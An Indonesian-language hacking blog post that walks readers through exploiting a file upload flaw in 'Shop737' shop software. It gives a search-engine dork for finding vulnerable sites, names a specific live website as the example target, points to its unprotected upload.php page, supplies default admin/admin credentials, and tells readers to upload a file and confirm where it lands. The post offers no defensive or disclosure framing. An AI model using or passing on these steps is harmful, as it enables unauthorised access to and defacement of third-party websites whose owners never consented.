Exploit Shop737 File Upload Vulnerability

1. Cari web target
    Dork : intext:"Powered by Shop737"

    Dalam tutorial kali ini saya memilih website http://www.yungshe.com.

2. Buka website yang kalian pilih.
   

    Misal     : http://www.yungshe.com/poto/index.php?imgdir=Pelangsing%20Herbal
    Exploit   : site/poto/upload.php
    Menjadi : http://www.yungshe.com/poto/upload.php

3. Jika disuruh masukkin username & password masukkin aja ini :
    Username : admin
    Password : admin

4. Enter aja dan liat halaman selanjutnya :D


    liat gambar aja. Tutor nya ada disitu :D

5. Tunggu proses upload sampe selesai. Kalo udah selesai uploadnya langsung cek bro :D
    site/poto/[kategori]/[namafile].txt





Leave a Reply


[ PLAYGROUND ]

Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity